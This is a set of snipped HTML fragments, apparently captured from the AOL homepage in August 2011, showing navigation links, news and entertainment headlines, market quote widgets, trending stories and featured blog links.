...[SNIP]...
<td class='underline_cell'><a title="The definitive source for news and information on the video game industry" name="om_hnav_sec4_link4" class="icid-navbar_joystiq lnid-sec4_lnk4" href="http://www.joystiq.com/">Joystiq</a>
...[SNIP]...
<td class='underline_cell'><a title="Your source for Apple news, tips, reviews and how-tos" name="om_hnav_sec4_link5" class="icid-navbar_tuaw lnid-sec4_lnk5" href="http://www.tuaw.com/">TUAW</a>
...[SNIP]...
<td><a title="A blog about technology news and analysis, as well as profiling of startup companies, products and websites" name="om_hnav_sec4_link6" class="icid-navbar_techcrunch lnid-sec4_lnk6" href="http://techcrunch.com/">TechCrunch</a>
...[SNIP]...
<li><a title="Style" name="om_hnav_sec5_link1" class="icid-navbar_rootstyle lnid-sec5_lnk2" href="http://www.huffingtonpost.com/style"><b>
...[SNIP]...
<div class='hnav_header'><a title="Style" name="om_hnav_sec5_link1" class="icid-navbar_rootstyle lnid-sec5_lnk2" href="http://www.huffingtonpost.com/style"><b>
...[SNIP]...
<td class='underline_cell'><a title="African American news, culture and community" name="om_hnav_sec5_link3" class="icid-navbar_bv lnid-sec5_lnk3" href="http://www.blackvoices.com/">Black Voices</a>
...[SNIP]...
<td class='underline_cell'><a title="Parenting advice, news, deals and more from ParentDish" name="om_hnav_sec5_link4" class="icid-navbar_parent lnid-sec5_lnk4" href="http://www.huffingtonpost.com/parents/">Family</a>
...[SNIP]...
<td class='underline_cell'><a title="Recipes, Cooking Tips, Food Advice and Menus" name="om_hnav_sec5_link5" class="icid-navbar_food lnid-sec5_lnk5" href="http://www.kitchendaily.com">Food</a>
...[SNIP]...
<td class='underline_cell'><a title="Health information, news, diet and fitness tips, tools and more" name="om_hnav_sec5_link6" class="icid-navbar_health lnid-sec5_lnk6" href="http://www.everydayhealth.com/aol">Health</a>
...[SNIP]...
<td class='underline_cell'><a title="Daily, weekly and monthly forecasts, astrology, tarot and numerology" name="om_hnav_sec5_link8" class="icid-navbar_horo lnid-sec5_lnk8" href="http://horoscopes.mydaily.com">Horoscopes</a>
...[SNIP]...
<td class='underline_cell'><a title="Latin American news, photos, AIM and free e-mail in Spanish" name="om_hnav_sec5_link9" class="icid-navbar_latino lnid-sec5_lnk9" href="http://www.aollatino.com/">Latino</a>
...[SNIP]...
<td class='underline_cell'><a title="Fashion trends, product reviews, beauty tips and more from StyleList" name="om_hnav_sec5_link10" class="icid-navbar_style lnid-sec5_lnk10" href="http://www.stylelist.com">StyleList</a>
...[SNIP]...
<td><a title="Healthy Living News and Opinion" name="om_hnav_sec5_link12" class="icid-navbar_wellness lnid-sec5_lnk12" href="http://www.huffingtonpost.com/healthy-living">Wellness</a>
...[SNIP]...
<td class='underline_cell'><a title="Offering free, online coupon codes and cash back savings for online discounts" name="om_hnav_sec6_link3" class="icid-navbar_coupons lnid-sec6_lnk3" href="http://shortcuts.com/">Coupons</a>
...[SNIP]...
<td class='underline_cell'><a title="Lets you quickly build simple and visually elegant splash pages that point visitors to your content from around the web." name="om_hnav_sec7_link4" class="icid-navbar_aboutme lnid-sec7_lnk4" href="https://about.me/">About.Me</a>
...[SNIP]...
<li><a title="Play hundreds of free online games from Games.com" name="om_hnav_sec8_link1" class="icid-navbar_rootgames lnid-sec8_lnk1" href="http://www.games.com"><b>
...[SNIP]...
<li><a title="Get maps, driving directions, gas prices, local information and more" name="om_hnav_sec10_link1" class="icid-navbar_rootmapquest lnid-sec10_lnk1" href="http://www.mapquest.com/"><b>
...[SNIP]...
<li><a title="Your source for local knowledge" name="om_hnav_sec11_link1" class="icid-navbar_rootpatch lnid-sec11_lnk1" href="http://www.patch.com"><b>
...[SNIP]...
<li><a title="Free online radio offering 350+ sports, news, talk and music stations" name="om_hnav_sec12_link1" target="_blank" class="icid-navbar_rootradio lnid-sec12_lnk1" href="http://player.radio.com/player/AOLPlayer.php?version=1.2.11740&amp;station=+StationID+oString"><b>
...[SNIP]...
</span>
<a id="dlimg" name="om_dl1_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl1|sec1_lnk1|87589" href="http://www.huffingtonpost.com/2011/08/18/norway-attacks-anders-behring-breivik-called-police_n_930617.html"><img height="217" alt="Norway Attacks" width="386" src="http://i.huffpost.com/gen/332778/thumbs/a-NORWAY-386x217.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl1_hdln" href="http://www.huffingtonpost.com/2011/08/18/norway-attacks-anders-behring-breivik-called-police_n_930617.html" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl1|sec1_lnk2|87589">New Details in Norway Massacre
</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl1_cpy" href="http://www.huffingtonpost.com/2011/08/18/norway-attacks-anders-behring-breivik-called-police_n_930617.html" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl1|sec1_lnk3|87589">Who he dialed (& hung up on) twice
</a>
...[SNIP]...
<li ><a name="om_dl1_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl1|sec3_lnk1|87589" href="http://www.foxnews.com/world/2011/08/18/israel-radio-says-second-bus-attacked-by-gunfire/">Israel Attacked by 'Terror Squad'</a>
...[SNIP]...
<li ><a name="om_dl1_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl1|sec3_lnk2|87589" href="http://www.huffingtonpost.com/2011/08/18/texas-drought-2011-town_n_930308.html">US City May Run Out of Water</a>
...[SNIP]...
<li ><a name="om_dl1_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl1|sec3_lnk3|87589" href="http://www.huffingtonpost.com/2011/08/18/jon-stewart-rips-ed-schultz_n_930618.html">Jon Stewart Rips Into Ed Schultz</a>
...[SNIP]...
<h2 id="om_news_more-news_title"><a class="lnid-sec1_lnk1" href="http://www.huffingtonpost.com/">Latest Headlines</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/wall-street-sell-off_n_930510.html" class="lnid-sec2_lnk1">Stocks Plunge As More Signs Of Economic Weakness Emerge</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/officials-change-deportation-policy_n_930688.html" class="lnid-sec2_lnk2">Officials Change Deportation Policy</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/bahrain-protesters-clash-_n_930877.html" class="lnid-sec2_lnk3">Bahrain Protesters Clash With Security Forces</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/aig-bailout_n_930867.html" class="lnid-sec2_lnk4">AIG Repays $2.15 Billion Of Its Bailout Money</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/2-men-plead-guilty-in-swa_n_930827.html" class="lnid-sec2_lnk5">Two Plead Guilty For Branding Swastika On Navajo Man</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/mohammad-younis-man-linke_n_930844.html" class="lnid-sec2_lnk6">Man Linked To Times Square Bomber Pleads Guilty</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/afghanistan-roadside-bomb_n_930780.html" class="lnid-sec2_lnk7">Roadside Bomb Kills 12 Children In Afghanistan</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/elizabeth-warren-exploratory-committee_n_930530.html" class="lnid-sec2_lnk8">Elizabeth Warren Takes Next Step Toward Possible Senate Run</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/norway-attacks-anders-behring-breivik-called-police_n_930617.html" class="lnid-sec2_lnk9">Norway Killer Called Authorities Twice During Shooting, Police Say</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/los-angeles-downgraded-by_n_930296.html" class="lnid-sec2_lnk10">Los Angeles Downgraded By Standard & Poor's</a>
...[SNIP]...
</ul><a name="om_news_more-news_more" class="newsmore newsmoreinline lnid-sec3_lnk1" href="http://www.huffingtonpost.com">More News</a>
...[SNIP]...
<h2><a name="om_marketquotes_title" href="http://www.dailyfinance.com/market-news/" class=" lnid-sec1_lnk1">Market Quotes</a>
...[SNIP]...
<span class="sprite down"><img class="noion" src="http://portal.aolcdn.com/p5/_v58.6/css/maing.png" alt="down"></span>
...[SNIP]...
<td class="ticker-name"><a name="om_marketquotes_quote1" href="http://www.dailyfinance.com/quotes/dow-jones-industrial-average/%24indu/dji">

DJIA
</a>
...[SNIP]...
<span class="sprite down"><img class="noion" src="http://portal.aolcdn.com/p5/_v58.6/css/maing.png" alt="down"></span>
...[SNIP]...
<td class="ticker-name"><a name="om_marketquotes_quote2" href="http://www.dailyfinance.com/quotes/nasdaq-composite/%24compx/nai">

NASDAQ
</a>
...[SNIP]...
<span class="sprite down"><img class="noion" src="http://portal.aolcdn.com/p5/_v58.6/css/maing.png" alt="down"></span>
...[SNIP]...
<td class="ticker-name"><a name="om_marketquotes_quote3" href="http://www.dailyfinance.com/quotes/sandp-500-index-rth/%24inx/cmi">

S&P 500
</a>
...[SNIP]...
<div class="markets-footer">
<a name="om_marketquotes_link1" class="lnid-sec2_lnk1 first" href="http://www.dailyfinance.com/portfolios/myportfolios">My Portfolios</a><a name="om_marketquotes_link2" class="lnid-sec2_lnk2" href="http://www.dailyfinance.com/market-news/">Markets</a><a name="om_marketquotes_link3" class="lnid-sec2_lnk3 last" href="http://www.dailyfinance.com/">Finance News</a>
...[SNIP]...
<h2 id="om_news_business-news_title"><a class="lnid-sec1_lnk1" href="http://www.dailyfinance.com/">Business News</a>
...[SNIP]...
<li><a class="lnid-sec2_lnk1" href="http://www.dailyfinance.com/market-news/">More Signs of Economic Weakness Spark Major Selloff</a>
...[SNIP]...
<li><a class="lnid-sec2_lnk2" href="http://www.dailyfinance.com/2011/08/18/are-you-photoshopping-your-finances/">Are Your Photoshopping Your Finances?</a>
...[SNIP]...
<li><a class="lnid-sec2_lnk3" href="http://www.dailyfinance.com/2011/08/17/u-s-credit-card-debt-declines/">How to Dig Yourself Out of Credit Card Debt</a>
...[SNIP]...
<li><a class="lnid-sec2_lnk4" href="http://www.dailyfinance.com/2011/08/18/back-to-school-fashion-uniforms-gain-popularity-and-coolness/">School Uniforms: More Popular, More Fashionable</a>
...[SNIP]...
<li><a class="lnid-sec2_lnk5" href="http://money.cnn.com/2011/08/18/news/international/markets_morgan_stanley/index.htm?iid=HP_LN">Morgan Stanley: We're 'Dangerously Close' to Recession</a>
...[SNIP]...
<li><a class="lnid-sec2_lnk6" href="http://247wallst.com/2011/08/17/the-richest-diamond-mines-in-the-world/">The Richest Diamond Mines in the World</a>
...[SNIP]...
</ul><a name="om_news_business-news_more" class="newsmore newsmoreinline lnid-sec3_lnk1" href="http://www.dailyfinance.com/">More Business News</a>
...[SNIP]...
<h2 id="om_news_sports-news_title"><a class="lnid-sec1_lnk1" href="http://www.fanhouse.com/">Sports News</a>
...[SNIP]...
<li><a href="http://aol.sportingnews.com/ncaa-basketball/story/2011-08-18/georgetown-game-in-china-ends-in-bench-clearing-brawl" class="lnid-sec2_lnk1">Basketball Game in China Ends With Bench-Clearing Brawl</a>
...[SNIP]...
<li><a href="http://aol.sportingnews.com/nfl/story/2011-08-18/michael-vick-to-gq-i-miss-my-dogs" class="lnid-sec2_lnk2">Michael Vick Says He Misses Owning Dogs</a>
...[SNIP]...
<li><a href="http://aol.sportingnews.com/mlb/story/2011-08-18/hideki-irabus-death-officially-ruled-a-suicide" class="lnid-sec2_lnk3">Ex-Yankee Irabu's Death Officially Ruled a Suicide</a>
...[SNIP]...
<li><a href="http://aol.sportingnews.com/nascar/story/2011-08-18/former-price-is-right-model-maryeve-dufault-racing-in-nascar" class="lnid-sec2_lnk4">Former Price is Right Model Making NASCAR Debut</a>
...[SNIP]...
<li><a href="http://aol.sportingnews.com/sport/story/2011-08-18/tiger-woods-lebron-james-accused-of-being-cheap-tippers" class="lnid-sec2_lnk5">Tiger, LeBron accused of being cheap tippers</a>
...[SNIP]...
<li><a href="http://aol.sportingnews.com/mlb/story/2011-08-18/mike-jacobs-tests-positive-for-hgh-is-released-by-rockies" class="lnid-sec2_lnk6">Minor League Player Suspended 50 Games for HGH Use</a>
...[SNIP]...
<li><a href="http://aol.sportingnews.com/ncaa-football/story/2011-08-18/barry-alvarez-chad-1-million-loss-in-shapiro-ponzi-scheme" class="lnid-sec2_lnk7">Wisconsin AD and Family Lose $1 Million in Ponzi Scheme</a>
...[SNIP]...
</ul><a name="om_news_sports-news_more" class="newsmore newsmoreinline lnid-sec3_lnk1" href="http://www.fanhouse.com">More Stories</a>
...[SNIP]...
<h2 id="om_news_entertainment-news_title"><a class="lnid-sec1_lnk1" href="http://www.huffingtonpost.com/entertainment/">Entertainment News</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/josh-groban-joins-the-office_n_930818.html" class="lnid-sec2_lnk1">'The Office' Gets An Unexpected New Star</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/betty-white-is-americas-most-trusted-celebrity_n_930740.html" class="lnid-sec2_lnk2">Betty White: America's Most Trusted Celebrity</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/stage-collapse-at-pukkelpop-belgium-kills_n_930705.html" class="lnid-sec2_lnk3">Another Stage Collapse Kills At Least One</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/texas-killing-fields-trailer_n_930675.html" class="lnid-sec2_lnk4">Sam Worthington, Jessica Chastain Enter Killing Fields</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/justin-bieber-tops-list-of-richest-teen-entertainers_n_930578.html" class="lnid-sec2_lnk5">Who Are Hollywood's Richest Teens?</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/blade-runner-ridley-scott-new-film_n_930593.html" class="lnid-sec2_lnk6">Legendary Film Getting Unexpected Revamp</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/burt-reynolds-facing-foreclosure_n_930443.html" class="lnid-sec2_lnk7">Burt Reynolds Facing Foreclosure</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/kim-kardashians-wedding-workout_n_930316.html" class="lnid-sec2_lnk8">WATCH: Kim Kardashian's Wedding Workout</a>
...[SNIP]...
</ul><a name="om_news_entertainment-news_more" class="newsmore newsmoreinline lnid-sec3_lnk1" href="http://www.huffingtonpost.com/entertainment/">More Entertainment News</a>
...[SNIP]...
andalonevj-.5- adrefresh-true hiderelvids- lnid-sec2_lnk1 vplident-1116699228001 vplname-urlesque-mans-about-to-do-the-impossible" href="video/urlesque-mans-about-to-do-the-impossible/1116699228001/"><img height="155" width="233" class="vjimg" src="http://i.huffpost.com/gen/332441/thumbs/a-MAN-DEFIES-PHYSICS-233x155.jpg"/><div class="vbpos-bottom-right videobutton" style="width:41px; height:41px; ">
<img src="http://portal.aolcdn.com/p5/forms/1439/4d409bd3-5f87-4f0a-adb2-b0fa9450f8c6.png" alt="" class="playbutton" title=""/><img src="http://portal.aolcdn.com/p5/forms/1439/b81d51ea-1a48-4e8d-9495-9ecbf12c337c.png" alt="" class="playbutton-over" title=""/><div class="vbtext" title="">
...[SNIP]...
<div class="gmod photo-lede mnid-daily-buzz1 plid-87598">
<a title="Price Is Right" name="om_daily-buzz_image_1" class="photo-link lnid-sec2_lnk1" href="http://aol.sportingnews.com/nascar/story/2011-08-18/former-price-is-right-model-maryeve-dufault-racing-in-nascar"><img alt="Price Is Right" src="http://i.huffpost.com/gen/332819/thumbs/a-MODEL-NASCAR-233x155.jpg"/></a>
...[SNIP]...
<h3><a name="om_daily-buzz_headline1" href="http://aol.sportingnews.com/nascar/story/2011-08-18/former-price-is-right-model-maryeve-dufault-racing-in-nascar" class=" lnid-sec2_lnk3">Former 'Price Is Right' Model Makes Unexpected Debut</a>
...[SNIP]...
<div class="gmod photo-lede mnid-daily-buzz2 plid-87597">
<a title="Chipotle" name="om_daily-buzz_image_2" class="photo-link lnid-sec3_lnk1" href="http://www.huffingtonpost.com/2011/08/18/chipotle-menu_n_930267.html"><img alt="Chipotle" src="http://i.huffpost.com/gen/332774/thumbs/a-CHIPOTLE-233x155.jpg"/></a>
...[SNIP]...
<h3><a name="om_daily-buzz_headline2" href="http://www.huffingtonpost.com/2011/08/18/chipotle-menu_n_930267.html" class=" lnid-sec3_lnk3">Chipotle Makes Nauseating Confession</a>
...[SNIP]...
<div class="gmod photo-lede mnid-daily-buzz3 plid-87639">
<a title="Russell Armstrong" name="om_daily-buzz_image_3" class="photo-link lnid-sec4_lnk1" href="http://www.huffingtonpost.com/2011/08/18/russell-armstrong-suicide-salary-bravo_n_930722.html"><img alt="Russell Armstrong" src="http://portal.aolcdn.com/p5/forms/656/00174597-3ffe-4883-9330-a301427eb1b9.jpg"/></a>
...[SNIP]...
<h3><a name="om_daily-buzz_headline3" href="http://www.huffingtonpost.com/2011/08/18/russell-armstrong-suicide-salary-bravo_n_930722.html" class=" lnid-sec4_lnk3">Russell's 'Housewives' Salary Not What You Might Think</a>
...[SNIP]...
<div class="gmod photo-lede mnid-daily-buzz4 plid-87630">
<a title="Belgium stage collapse" name="om_daily-buzz_image_4" class="photo-link lnid-sec5_lnk1" href="http://www.spinner.com/2011/08/18/smith-westerns-pukkelpop-stage-collapse/"><img alt="Belgium stage collapse" src="http://portal.aolcdn.com/p5/forms/2560/b289c2ee-3110-4211-98a8-3ec20b6bf58f.jpg"/></a>
...[SNIP]...
<h3><a name="om_daily-buzz_headline4" href="http://www.spinner.com/2011/08/18/smith-westerns-pukkelpop-stage-collapse/" class=" lnid-sec5_lnk3">Watch: Stage Collapse Kills 3 Music Fans, Injures Scores</a>
...[SNIP]...
<div class="gmod photo-lede mnid-daily-buzz5 plid-87595">
<a title="Pug" name="om_daily-buzz_image_5" class="photo-link lnid-sec6_lnk1" href="http://www.huffingtonpost.com/2011/08/17/otis-the-skydiving-pug-photo-video_n_929874.html"><img alt="Pug" src="http://i.huffpost.com/gen/332759/thumbs/a-PUG-233x155.jpg"/></a>
...[SNIP]...
<h3><a name="om_daily-buzz_headline5" href="http://www.huffingtonpost.com/2011/08/17/otis-the-skydiving-pug-photo-video_n_929874.html" class=" lnid-sec6_lnk3">Watch: 'Skydiving Pug' Makes 64th Jump</a>
...[SNIP]...
<div class="gmod photo-lede mnid-daily-buzz6 plid-87599">
<a title="Obama" name="om_daily-buzz_image_6" class="photo-link lnid-sec7_lnk1" href="http://www.huffingtonpost.com/2011/08/18/presidential-vacations-th_n_929376.html"><img alt="Obama" src="http://i.huffpost.com/gen/332814/thumbs/a-OBAMA-233x155.jpg"/></a>
...[SNIP]...
<h3><a name="om_daily-buzz_headline6" href="http://www.huffingtonpost.com/2011/08/18/presidential-vacations-th_n_929376.html" class=" lnid-sec7_lnk3">Photos: Embarrassing Pics Of Presidents on Vacation</a>
...[SNIP]...
<div class="gmod photo-lede mnid-daily-buzz7 plid-87559">
<a title="Nivea" name="om_daily-buzz_image_7" class="photo-link lnid-sec8_lnk1" href="http://www.huffingtonpost.com/2011/08/18/nivea-ad-racist_n_930501.html"><img alt="Nivea" src="http://i.huffpost.com/gen/332706/thumbs/a-NIVEA-1-233x155.jpg"/></a>
...[SNIP]...
<h3><a name="om_daily-buzz_headline7" href="http://www.huffingtonpost.com/2011/08/18/nivea-ad-racist_n_930501.html" class=" lnid-sec8_lnk3">Is Nivea's Controversial Ad <i>
...[SNIP]...
<div class="gmod photo-lede mnid-daily-buzz8 plid-87561">
<a title="Walmart" name="om_daily-buzz_image_8" class="photo-link lnid-sec9_lnk1" href="http://www.huffingtonpost.com/2011/08/18/monkey-scratches-young-girl_n_930365.html"><img alt="Walmart" src="http://i.huffpost.com/gen/332686/thumbs/a-GIRL-MONKEY-233x155.jpg"/></a>
...[SNIP]...
<h3><a name="om_daily-buzz_headline8" href="http://www.huffingtonpost.com/2011/08/18/monkey-scratches-young-girl_n_930365.html" class=" lnid-sec9_lnk3">Watch: Monkey Attacks Girl In Walmart Parking Lot</a>
...[SNIP]...
<a title="Lady Gaga" name="om_daily-buzz_image_9" class="photo-link lnid-sec10_lnk1" href="http://blog.music.aol.com/2011/08/18/lady-gaga-goes-braless-for-vma-promo"><img alt="Lady Gaga" src="http://i.huffpost.com/gen/303009/thumbs/a-GAGA-TWITTER-233x155.jpg"/></a>
...[SNIP]...
</span>
<a target="_blank" class="feedback" href="http://www.opselect.com/ad_feedback/survey.adp?src=115">Ad Feedback</a>
...[SNIP]...
<a id="adchoicelink" name="om_adchoices_link" class="feedback" href="http://adinfo.aol.com/about-our-ads/">Ad Choices<img class="feedback" src="http://portal.aolcdn.com/p5/forms/1245/9db9a9bc-ecd8-4f18-a67c-adc647f55731.jpg"/></a>
...[SNIP]...
<h3><a name="om_custom-content-1_headline" href="http://www.huffingtonpost.com/2011/08/11/kickstart-cleanse-huffpost-aol-challenge_n_922140.html?icid=acm50exclusive082011" class=" lnid-sec2_lnk1">Kick-Start Cleanse Community Challenge</a>
...[SNIP]...
<div class="video-still">
<a alt="" name="om_custom-content-1_image" href="http://www.huffingtonpost.com/2011/08/11/kickstart-cleanse-huffpost-aol-challenge_n_922140.html?icid=acm50exclusive082011"><img height="131" width="131" src="http://portal.aolcdn.com/p5/forms/678/b7783c03-e35d-42ef-9dad-f25c9643bfaa.jpg"/></a>
...[SNIP]...
<b><a href="http://www.huffingtonpost.com/2011/08/11/kickstart-cleanse-huffpost-aol-challenge_n_922140.html?icid=acm50exclusive082011" class=" lnid-sec2_lnk2">Sign up now!</a>
...[SNIP]...
<div class="story">
<a href="http://www.huffingtonpost.com/2011/08/17/christine-odonnell-walks-out-witchcraft_n_929986.html" name="om_trending-stories_img_1" class="lnid-sec1_lnk1 storyimg"><img src="http://i.huffpost.com/gen/331945/thumbs/s-CHRISTINE-ODONNELL-INTERVIEW-WITCHCRAFT-mini.jpg" alt="CHRISTINE ODONNELL INTERVIEW WITCHCRAFT"/></a><p><a href="http://www.huffingtonpost.com/politics" name="om_trending-stories_attr_1" class="lnid-sec1_lnk3 storyattr">Politics</a>: <a href="http://www.huffingtonpost.com/2011/08/17/christine-odonnell-walks-out-witchcraft_n_929986.html" name="om_trending-stories_link_1" class="lnid-sec1_lnk2 storytxt">Christine O'Donnell Walks Out Of CNN Interview</a>
...[SNIP]...
<div class="story">
<a href="http://www.dailyfinance.com/2011/08/17/social-security-mistakenly-declares-thousands-dead-each-year/" name="om_trending-stories_img_2" class="lnid-sec2_lnk1 storyimg"><img src="http://www.blogcdn.com/www.dailyfinance.com/media/2011/08/death-social-security-240cs081711_74x58.jpg" alt=""/></a><p><a href="http://www.dailyfinance.com" name="om_trending-stories_attr_2" class="lnid-sec2_lnk3 storyattr">Daily Finance</a>: <a href="http://www.dailyfinance.com/2011/08/17/social-security-mistakenly-declares-thousands-dead-each-year/" name="om_trending-stories_link_2" class="lnid-sec2_lnk2 storytxt">Social Security Mistakenly Declares Thousands Dead Each Year</a>
...[SNIP]...
<div class="story">
<a href="http://www.huffingtonpost.com/2011/08/18/anderson-cooper-loses-it-giggles-laughter_n_930208.html" name="om_trending-stories_img_3" class="lnid-sec3_lnk1 storyimg"><img src="http://i.huffpost.com/gen/332133/thumbs/s-ANDERSON-COOPER-mini.jpg" alt="ANDERSON COOPER"/></a><p><a href="http://www.huffingtonpost.com/media" name="om_trending-stories_attr_3" class="lnid-sec3_lnk3 storyattr">Media</a>: <a href="http://www.huffingtonpost.com/2011/08/18/anderson-cooper-loses-it-giggles-laughter_n_930208.html" name="om_trending-stories_link_3" class="lnid-sec3_lnk2 storytxt">WATCH: Anderson Cooper LOSES It, Collapses Into Huge Fit Of Giggles</a>
...[SNIP]...
<div class="story">
<a href="http://www.dailyfinance.com/2011/08/16/savings-experiment-get-the-best-bling-for-your-buck-when-buying/" name="om_trending-stories_img_4" class="lnid-sec4_lnk1 storyimg"><img src="http://www.blogcdn.com/www.dailyfinance.com/media/2011/08/diamond-ring-240cs081611-1313425590_74x58.jpg" alt="Diamond Ring"/></a><p><a href="http://www.dailyfinance.com" name="om_trending-stories_attr_4" class="lnid-sec4_lnk3 storyattr">Daily Finance</a>: <a href="http://www.dailyfinance.com/2011/08/16/savings-experiment-get-the-best-bling-for-your-buck-when-buying/" name="om_trending-stories_link_4" class="lnid-sec4_lnk2 storytxt">Savings Experiment: Get the Best Bling for Your Buck When Buying a Diamond Ring</a>
...[SNIP]...
<div class="story">
<a href="http://www.mmafighting.com/2011/08/17/krzysztof-soszynski-says-at-least-85-percent-of-fighters-defini/" name="om_trending-stories_img_5" class="lnid-sec5_lnk1 storyimg"><img src="http://www.blogcdn.com/www.mmafighting.com/media/2011/08/ksos_74x58.jpg" alt=""/></a><p><a href="http://www.mmafighting.com" name="om_trending-stories_attr_5" class="lnid-sec5_lnk3 storyattr">MMA Fighting</a>: <a href="http://www.mmafighting.com/2011/08/17/krzysztof-soszynski-says-at-least-85-percent-of-fighters-defini/" name="om_trending-stories_link_5" class="lnid-sec5_lnk2 storytxt">Krzysztof Soszynski Says at Least 85 Percent of Fighters 'Definitely Using' PEDs</a>
...[SNIP]...
<div class="story">
<a href="http://www.huffingtonpost.com/2011/08/18/abigail-breslin-in-the-class-project_n_930172.html" name="om_trending-stories_img_6" class="lnid-sec6_lnk1 storyimg"><img src="http://i.huffpost.com/gen/332095/thumbs/s-BRESLIN-mini.jpg" alt="BRESLIN"/></a><p><a href="http://www.huffingtonpost.com/celebrity" name="om_trending-stories_attr_6" class="lnid-sec6_lnk3 storyattr">Celebrity</a>: <a href="http://www.huffingtonpost.com/2011/08/18/abigail-breslin-in-the-class-project_n_930172.html" name="om_trending-stories_link_6" class="lnid-sec6_lnk2 storytxt">Abigail Breslin Goes Dark: Teen Mom Murderer</a>
...[SNIP]...
<div class="story last">
<a href="http://www.aoltv.com/2011/08/17/dancing-with-the-stars-season-13-george-clooneys-ex-in-quee/" name="om_trending-stories_img_7" class="lnid-sec7_lnk1 storyimg"><img src="http://www.blogcdn.com/www.aoltv.com/media/2011/08/elisabetta-wireimage-300_74x58.jpg" alt="Elisabette Canalis"/></a><p><a href="http://www.aoltv.com" name="om_trending-stories_attr_7" class="lnid-sec7_lnk3 storyattr">AOL TV</a>: <a href="http://www.aoltv.com/2011/08/17/dancing-with-the-stars-season-13-george-clooneys-ex-in-quee/" name="om_trending-stories_link_7" class="lnid-sec7_lnk2 storytxt">'Dancing With the Stars' Season 13: George Clooney's Ex In, Queen Latifah Out</a>
...[SNIP]...
<div class="aol-twitter-like lnid-sec1_lnk2" id="om_followme_2_follow-me-module">
<a href="http://twitter.com/AOL" data-show-count="false" class="twitter-follow-button followmemodule_TWlike">Follow @AOL</a>
...[SNIP]...
</div>
<a name="om_followme_3" href="http://aol.it/jmiFya" class="nlm lnid-sec1_lnk3 last">Newsletter</a>
...[SNIP]...
<h2><a name="om_featured-blog-posts-feed_title" class="lnid-sec1_lnk1" href="http://www.huffingtonpost.com/theblog/index/">Featured Blog Posts</a>
...[SNIP]...
<div class="about">
<img class="headshot" alt="Bonnie Fuller" src="http://s.huffpost.com/contributors/bonnie-fuller/headshot.jpg"/>
<p class="vertical"><a href="http://www.huffingtonpost.com/entertainment" name="om_featured-blog-rss_sec2_vert" class="lnid-sec2_lnk1">ENTERTAINMENT</a>
...[SNIP]...
<h3 class="headline"><a href="http://www.huffingtonpost.com/bonnie-fuller/kim-kardashian-married_b_930798.html" name="om_featured-blog-rss_sec2_hl" class="headline lnid-sec2_lnk2">Kim Kardashian: 10 Tips to Make Your Marriage Last Forever</a>
...[SNIP]...
<p class="read"><a href="http://www.huffingtonpost.com/bonnie-fuller/kim-kardashian-married_b_930798.html" name="om_featured-blog-rss_sec2_read" class="read lnid-sec2_lnk3">Read Post</a> | <a href="http://www.huffingtonpost.com/bonnie-fuller/kim-kardashian-married_b_930798.html#comments" name="om_featured-blog-rss_sec2_cmnt" class="comments lnid-sec2_lnk4">Comments</a>
...[SNIP]...
<div class="about">
<img class="headshot" alt="Jon M. Sweeney" src="http://s.huffpost.com/contributors/jon-m-sweeney/headshot.jpg"/>
<p class="vertical"><a href="http://www.huffingtonpost.com/religion" name="om_featured-blog-rss_sec3_vert" class="lnid-sec3_lnk1">RELIGION</a>
...[SNIP]...
<h3 class="headline"><a href="http://www.huffingtonpost.com/jon-m-sweeney/lady-gaga-catholic_b_926420.html" name="om_featured-blog-rss_sec3_hl" class="headline lnid-sec3_lnk2">Is Lady Gaga Catholic?</a>
...[SNIP]...
<p class="read"><a href="http://www.huffingtonpost.com/jon-m-sweeney/lady-gaga-catholic_b_926420.html" name="om_featured-blog-rss_sec3_read" class="read lnid-sec3_lnk3">Read Post</a> | <a href="http://www.huffingtonpost.com/jon-m-sweeney/lady-gaga-catholic_b_926420.html#comments" name="om_featured-blog-rss_sec3_cmnt" class="comments lnid-sec3_lnk4">Comments</a>
...[SNIP]...
<div class="about">
<img class="headshot" alt="Melissa Lafsky" src="http://s.huffpost.com/contributors/melissa-lafsky/headshot.jpg"/>
<p class="vertical"><a href="http://www.huffingtonpost.com/women" name="om_featured-blog-rss_sec4_vert" class="lnid-sec4_lnk1">WOMEN</a>
...[SNIP]...
<h3 class="headline"><a href="http://www.huffingtonpost.com/melissa-lafsky/5-truths-about-your-paren_b_930216.html" name="om_featured-blog-rss_sec4_hl" class="headline lnid-sec4_lnk2">5 Truths About Your Parents That No One Tells You</a>
...[SNIP]...
